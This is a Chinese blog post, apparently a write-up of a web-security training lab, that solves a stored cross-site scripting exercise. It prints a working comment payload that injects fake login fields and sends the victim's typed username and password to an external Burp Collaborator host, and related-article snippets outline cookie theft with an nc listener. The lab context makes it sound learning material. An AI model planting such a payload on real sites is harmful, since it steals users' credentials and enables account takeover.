Lab: Exploiting cross-site scripting to capture passwords:利用XSS来窃取密码

最新推荐文章于 2023-02-01 10:00:00 发布
最新推荐文章于 2023-02-01 10:00:00 发布
阅读量354 收藏
点赞数
文章标签: 安全 python 数据库 linux java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793756
版权

靶场内容

本实验包含博客评论功能中的存储型 XSS漏洞。一个模拟的受害者用户在发布后查看所有评论。为了破解实验室,利用该漏洞窃取受害者的用户名和密码,然后使用这些凭据登录受害者的帐户。

解决方法

  • 将脚本放到评论区:
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://kwkml3x2cqtjs322yuesydmrqiw8kx.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
  • 抓下来:HTTP报文里面有密码image
  • 登录即可
Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
XSS偷取密码Cookies通用脚本
收集盒 Book box
08-30 997
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取的cookies
xss攻击之盗取账号
zhangzhangdan的博客
07-17 5123
XSS攻击:跨站脚本攻击(Cross Site Scripting),是一种用javascript脚本写的攻击方式 一般测试,我们会在运行的一段代码中写入一段javascript代码,在程序运行的的时候它会显示出来: &lt;?php public function index() { $str = "&lt;sctipt&gt;alert('aa')&lt;script&gt;"; ...
XSS漏洞
qq_48947141的博客
10-03 3097
一、XSS漏洞简介 XSS(Cross-Site Scripting):跨站脚本攻击,为不与层叠样式表的缩写混淆,将跨站脚本攻击缩写为XSSXSS漏洞是一种在Web应用中常见的安全漏洞,它允许用户将恶意代码植入Web页面,当其他用户访问此页面,植入的恶意代码就会在其他用户的客户端执行。 二、XSS的分类 1、反射型XSS漏洞 利用反射型XSS漏洞植入的恶意代码不会存储在服务器端,一般通过搜索页面,需要构造植入恶意代码的Web页面,诱骗受害者访问该页面,才能触发攻击。 2、存储型XSS漏洞
渗透测试-xss漏洞之反射型(post)获取用户密码
lza20001103的博客
04-24 3614
xss之反射型(post)获取用户密码
Web安全XSS跨站脚本攻击
最新发布
Button12138的博客
02-01 1172
XSS 攻击通常指黑客利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点
Attacks on Wireless Coexistence Exploiting Cross-Technology Perf
01-02
利用跨技术性能特征实现芯片间权限提升的无线共存攻击》 现代移动设备中集成了多种无线技术,如蓝牙、Wi-Fi和LTE,它们分别由独立的无线芯片实现,有时封装为组合芯片。这些芯片共享组件和资源,如相同的天线或...
VINCE: Exploiting Visible Light Sensing for Smartphone-based NFC Systems
02-09
VINCE encodes information as different brightness levels of smartphone screens, while receivers capture the light signal via light sensors. We experimentally profile the impact of screen brightness ...
Two Birds with One Stone: Exploiting Direct Links for Multiuser Two-Way Relaying Systems
02-21
本篇文章主要探讨了在多用户双向中继系统中,如何利用直接链路(Direct Links)来提高系统性能的问题。文章提出了一个结合多用户分集(MUD)和增量中继(incremental relaying)的机制,并通过半双工放大转发(AF)...
Exploiting Software - How to Break Code.rar
11-05
Exploiting Software - How to Break Code.rar
Social Attribute-aware Force Model: Exploiting Richness of Interaction for AbnormalCrowd Detection
02-07
### Social Attribute-aware Force Model: Exploiting Richness of Interaction for Abnormal Crowd Detection #### 概述 本研究提出了一种社会属性感知力模型(Social Attribute-aware Force Model),旨在通过捕捉...
网络安全学习笔记——XSS漏洞
just do it
11-22 1632
XSS(Cross-site scripting)跨站脚本攻击。(缩写为CSS,但会与层叠样式表 Cascading Style Sheets 混淆,故称XSS)通常发生在客户端,可被用于进行窃取隐私,钓鱼欺骗,窃取密码,传播恶意代码等。
技巧:XSS漏洞结合nc窃取Cookie实现免密码登录
weixin_51339377的博客
04-18 2044
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!) 如果某天不能用外网,也不能用kali 存储型xss最重要的是获取用户的cookie!!!!!!!!!! document.cookie 获取用户所在网站的cookie 1.在黑客端用nc进行监听 nc -lvp 4444 //使用nc监听4444端口 2.XSS注入的恶意script脚本 <script>var img = docum...
xss盲打(通过xss盲打盗取管理员账号和密码!)
qq_43814486的博客
05-03 6625
原理: 其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞! 上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下: 1,我输入的payload: <script>documen...
xss之cookie窃取
weixin_30911809的博客
03-07 582
一、窃取cookie有什么用? cookie相当于一个身份证 有了管理员的cookie我们不需要帐号密码就可以登陆 二、反射型xss有存贮型xss什么区别? 反射 xss和服务器没有交互 只能用一次 储存 xss和服务器有交互 可以反复使用 危害较大 三、本次教程用到的工具 1.phpstudy(PHP调试环境的程序集成包) 2.dv...
手把手教你用JS写XSS cookie stealer来窃取密码
weixin_50464560的博客
08-24 996
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。JS可以有很多的函数可以用做恶意用途,包括窃取含有密码等内容的用户cookie。Cookie是站点请求和保持特定访问页面的信息。Cookie含有访问的方式、时间、用户名密码等认证信息等。当用户访问给定站点时,必须使用cookie;如果攻击者可以拦截cookie,就可以利用cookie窃取用户的一些信息。对某个特定的域名,使用JS可以保存或修改用户的cookie。也就是说,如果攻击者可以
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1199
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
XSS盗取用户信息
qq_43776408的博客
07-27 981
盗取用户信息原理 类似于你要登QQ 我给你一个链接 你点开这个链接登录 你的用户名和密码都保存在这个链接所对应的服务器上 就不是官方服务器上了 setookit工具克隆网站 直接kali中输入setookit 假设win的IP地址为0.100 我们准备克隆下面的网站 192.168.0.100/dvwa/login.php 然后kali中的setookit中有很多选项 1231确定 下图你可以看到使用的是kali默认的IP0.104 然后再Enter the url后输入你想要克隆的网站URL 就刚才
XSS注入-盗取用户信息和内容篡改
qq_25899635的博客
05-28 1915
cookie介绍   Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由Web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。   目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段时间,一但超过规定时间,该Cookie就会被系统清除。   服务器可以利用Cookie包含信息的任意性来筛选并经...
网络打印机安全研究:Exploiting Network Printers
"藏经阁-Exploiting Network Printers.pdf" 该文档主要探讨了网络打印机的安全问题及其利用方法,由Jens Müller、Vladislav Mladenov、Juraj Somorovsky和Jörg Schwenk撰写。文章分为背景、攻击、评估、PRET...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值